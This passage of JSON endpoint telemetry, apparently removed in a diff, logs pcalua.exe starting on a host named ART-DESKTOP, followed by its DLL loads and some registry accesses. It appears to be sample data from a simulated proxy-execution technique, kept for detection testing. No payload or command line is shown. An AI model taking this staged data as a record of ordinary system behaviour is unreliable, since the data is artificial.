7392, - "ppid": 3920, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "subtype": "create", - "timestamp": 131883574014090000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}", - "unique_ppid": "{42FC7E13-CC19-5C05-0000-0010716D5701}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "pcalua.exe", - "image_path": "C:\\Windows\\System32\\pcalua.exe", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014050000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014050000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014050000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014050000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "image_load", - "image_name": "user32.dll", - "image_path": "C:\\Windows\\System32\\user32.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014050000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "image_load", - 
"image_name": "win32u.dll", - "image_path": "C:\\Windows\\System32\\win32u.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014140000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "image_load", - "image_name": "gdi32.dll", - "image_path": "C:\\Windows\\System32\\gdi32.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014140000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "image_load", - "image_name": "gdi32full.dll", - "image_path": "C:\\Windows\\System32\\gdi32full.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014140000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "image_load", - "image_name": "msvcp_win.dll", - "image_path": "C:\\Windows\\System32\\msvcp_win.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014140000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "image_load", - "image_name": "ucrtbase.dll", - "image_path": "C:\\Windows\\System32\\ucrtbase.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014140000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014140000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "image_load", - "image_name": "shell32.dll", - "image_path": "C:\\Windows\\System32\\shell32.dll", - 
"pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014140000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "image_load", - "image_name": "cfgmgr32.dll", - "image_path": "C:\\Windows\\System32\\cfgmgr32.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014140000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "image_load", - "image_name": "SHCore.dll", - "image_path": "C:\\Windows\\System32\\SHCore.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014140000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014140000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "image_load", - "image_name": "combase.dll", - "image_path": "C:\\Windows\\System32\\combase.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014140000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "image_load", - "image_name": "bcryptprimitives.dll", - "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014140000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "image_load", - "image_name": "windows.storage.dll", - "image_path": "C:\\Windows\\System32\\windows.storage.dll", - "pid": 7392, - "process_name": "pcalua.exe", - 
"process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014140000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014140000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014140000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "image_load", - "image_name": "shlwapi.dll", - "image_path": "C:\\Windows\\System32\\shlwapi.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014140000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "image_load", - "image_name": "kernel.appcore.dll", - "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014140000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "image_load", - "image_name": "profapi.dll", - "image_path": "C:\\Windows\\System32\\profapi.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014140000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "image_load", - "image_name": "powrprof.dll", - "image_path": "C:\\Windows\\System32\\powrprof.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 
131883574014140000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "image_load", - "image_name": "fltLib.dll", - "image_path": "C:\\Windows\\System32\\fltLib.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014140000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "image_load", - "image_name": "pcaui.dll", - "image_path": "C:\\Windows\\System32\\pcaui.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014230000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "image_load", - "image_name": "oleaut32.dll", - "image_path": "C:\\Windows\\System32\\oleaut32.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014230000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "image_load", - "image_name": "apphelp.dll", - "image_path": "C:\\Windows\\System32\\apphelp.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014230000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "image_load", - "image_name": "comctl32.dll", - "image_path": "C:\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.441_none_fb3e9b173068fb23\\comctl32.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014230000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "image_load", - "image_name": "dui70.dll", - "image_path": "C:\\Windows\\System32\\dui70.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 
131883574014230000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "image_load", - "image_name": "wer.dll", - "image_path": "C:\\Windows\\System32\\wer.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014230000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "image_load", - "image_name": "imm32.dll", - "image_path": "C:\\Windows\\System32\\imm32.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014230000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "image_load", - "image_name": "uxtheme.dll", - "image_path": "C:\\Windows\\System32\\uxtheme.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014320000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:0000000000040570", - "registry_value": "W32:0000000000040570", - "timestamp": 131883574014320000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:0000000000040570", - "registry_path": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:0000000000040570\\VirtualDesktop", - "registry_value": "VirtualDesktop", - "timestamp": 131883574014320000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "image_load", - "image_name": "msctf.dll", - "image_path": "C:\\Windows\\System32\\msctf.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014320000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "image_load", - "image_name": "dwmapi.dll", - "image_path": "C:\\Windows\\System32\\dwmapi.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014320000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM", - "registry_path": "HKLM\\SOFTWARE", - "registry_value": "SOFTWARE", - "timestamp": 131883574014320000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM\\SOFTWARE", - "registry_path": "HKLM\\SOFTWARE\\Microsoft", - "registry_value": "Microsoft", - "timestamp": 131883574014320000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Input", - "registry_value": "Input", - "timestamp": 131883574014320000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - 
"event_type": "image_load", - "image_name": "TextInputFramework.dll", - "image_path": "C:\\Windows\\System32\\TextInputFramework.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014400000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "image_load", - "image_name": "CoreUIComponents.dll", - "image_path": "C:\\Windows\\System32\\CoreUIComponents.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014400000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "image_load", - "image_name": "CoreMessaging.dll", - "image_path": "C:\\Windows\\System32\\CoreMessaging.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014400000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "image_load", - "image_name": "ntmarta.dll", - "image_path": "C:\\Windows\\System32\\ntmarta.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014400000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "image_load", - "image_name": "WinTypes.dll", - "image_path": "C:\\Windows\\System32\\WinTypes.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014400000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "image_load", - "image_name": "WinTypes.dll", - "image_path": "C:\\Windows\\System32\\WinTypes.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014400000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "image_load", - 
"image_name": "ole32.dll", - "image_path": "C:\\Windows\\System32\\ole32.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014490000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", - "registry_value": "Locales", - "timestamp": 131883574014490000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "image_load", - "image_name": "propsys.dll", - "image_path": "C:\\Windows\\System32\\propsys.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014490000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "image_load", - "image_name": "clbcatq.dll", - "image_path": "C:\\Windows\\System32\\clbcatq.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014590000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "registry", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\WINDOWS\\system32\\pcalua.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883574014590000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "image_load", - "image_name": "ndfapi.dll", - "image_path": 
"C:\\Windows\\System32\\ndfapi.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014590000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014590000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "image_load", - "image_name": "wdi.dll", - "image_path": "C:\\Windows\\System32\\wdi.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014590000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014590000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "image_load", - "image_name": "duser.dll", - "image_path": "C:\\Windows\\System32\\duser.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014660000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "image_load", - "image_name": "xmllite.dll", - "image_path": "C:\\Windows\\System32\\xmllite.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014700000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "image_load", - "image_name": "atlthunk.dll", - "image_path": "C:\\Windows\\System32\\atlthunk.dll", - "pid": 7392, - "process_name": "pcalua.exe", - "process_path": 
"C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574014750000, - "unique_pid": "{42FC7E13-CC19-5C05-0000-0010716E5701}" - }, - { - "event_type": "registry", - "pid": 2136, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\System32\\svchost.exe", - "registry_key": "HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio", - "registry_path": "HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio\\Journal", - "registry_value": "Journal", - "timestamp": 131883574014940000, - "unique_pid": "{42FC7E13-B2AB-5C05-0000-0010B9AE0100}" - }, - { - "event_type": "registry", - "pid": 2136, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\System32\\svchost.exe", - "registry_key": "HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio\\Journal", - "registry_path": "HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio\\Journal\\Render", - "registry_value": "Render", - "timestamp": 131883574014940000, - "unique_pid": "{42FC7E13-B2AB-5C05-0000-0010B9AE0100}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:00000000000305D2", - "registry_value": "W32:00000000000305D2", - "timestamp": 131883574015119984, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:00000000000305D2", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:00000000000305D2\\VirtualDesktop", - "registry_value": "VirtualDesktop", - "timestamp": 131883574015119984, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4, - "process_name": "System", - "process_path": "System", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000", - "registry_value": "S-1-5-21-2047549730-3016700585-885829632-1000", - "timestamp": 131883574015119984, - "unique_pid": "{42FC7E13-B282-5C05-0000-0010EB030000}" - }, - { - "event_type": "registry", - "pid": 4, - "process_name": "System", - "process_path": "System", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000\\\\Device\\HarddiskVolume1\\Windows\\System32", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000\\\\Device\\HarddiskVolume1\\Windows\\System32\\pcalua.exe", - "registry_value": "pcalua.exe", - "timestamp": 131883574015119984, - "unique_pid": "{42FC7E13-B282-5C05-0000-0010EB030000}" - }, - { - "event_type": "registry", - "pid": 4, - "process_name": "System", - "process_path": "System", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000\\SequenceNumber", - "registry_value": 
"SequenceNumber", - "timestamp": 131883574015119984, - "unique_pid": "{42FC7E13-B282-5C05-0000-0010EB030000}" - }, - { - "event_type": "registry", - "pid": 2136, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\System32\\svchost.exe", - "registry_key": "HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio", - "registry_path": "HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio\\Journal", - "registry_value": "Journal", - "timestamp": 131883574015270000, - "unique_pid": "{42FC7E13-B2AB-5C05-0000-0010B9AE0100}" - }, - { - "event_type": "registry", - "pid": 2136, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\System32\\svchost.exe", - "registry_key": "HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio\\Journal", - "registry_path": "HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio\\Journal\\Render", - "registry_value": "Render", - "timestamp": 131883574015270000, - "unique_pid": "{42FC7E13-B2AB-5C05-0000-0010B9AE0100}" - }, - { - "event_type": "registry", - "pid": 6784, - "process_name": "AUDIODG.EXE", - "process_path": "C:\\WINDOWS\\system32\\AUDIODG.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}\\Properties", - "registry_value": "Properties", - "timestamp": 131883574015440000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "registry", - "pid": 6784, - "process_name": "AUDIODG.EXE", - "process_path": "C:\\WINDOWS\\system32\\AUDIODG.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}\\Properties", - "registry_value": "Properties", - "timestamp": 131883574015440000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "registry", - "pid": 6784, - "process_name": "AUDIODG.EXE", - "process_path": "C:\\WINDOWS\\system32\\AUDIODG.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}\\Properties", - "registry_value": "Properties", - "timestamp": 131883574015440000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "registry", - "pid": 6784, - "process_name": "AUDIODG.EXE", - "process_path": "C:\\WINDOWS\\system32\\AUDIODG.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}\\Properties", - "registry_value": "Properties", - "timestamp": 131883574015440000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "registry", - "pid": 6784, - "process_name": "AUDIODG.EXE", - "process_path": "C:\\WINDOWS\\system32\\AUDIODG.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}\\Properties", - "registry_value": "Properties", - "timestamp": 131883574015440000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "registry", - "pid": 6784, - "process_name": 
"AUDIODG.EXE", - "process_path": "C:\\WINDOWS\\system32\\AUDIODG.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\MMDevices\\Audio\\Render\\{8212fb14-44b4-407e-b997-e05f5ae1d8a5}\\Properties", - "registry_value": "Properties", - "timestamp": 131883574015440000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", - "registry_value": "Locales", - "timestamp": 131883574019560000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { 